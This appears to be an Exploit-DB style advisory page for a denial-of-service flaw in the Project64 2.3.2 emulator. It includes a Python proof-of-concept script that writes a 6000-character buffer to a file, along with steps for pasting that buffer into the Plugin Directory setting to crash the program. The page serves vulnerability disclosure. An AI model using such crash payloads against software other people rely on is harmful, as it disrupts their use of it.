Project64 2.3.2 - Denial Of Service (PoC)

vendor:

Project64

by:

Gionathan Reale

7.8

CVSS

HIGH

Denial Of Service

400

CWE

Product Name: Project64

Affected Version From: 2.3.2

Affected Version To: 2.3.2

Patch Exists: NO

Related CWE: N/A

CPE: a:project64:project64:2.3.2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 32-bit

2018

Project64 2.3.2 – Denial Of Service (PoC)

Project64 2.3.2 is vulnerable to a denial of service attack when a maliciously crafted payload is pasted into the 'Plugin Directory' field in the 'Options' > 'Settings' > 'Directories' menu. This causes the application to crash.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in the application.

Source

Exploit-DB raw data:

# Exploit Title: Project64 2.3.2  - Denial Of Service (PoC).
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-21
# Homepage: https://www.pj64-emu.com
# Software Link:https://www.pj64-emu.com/download/project64-latest
# Tested Version: 2.3.2
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. In the new window click "Options" > "Settings" > "Directories". Now paste the content of 
# "exploit.txt" into the field:"Plugin Directory" and make sure it is selected. Click "Apply" > "Ok" and then reopen "Options" > "Settings" you will see a crash.

#!/usr/bin/python
   
buffer = "A" * 6000

payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"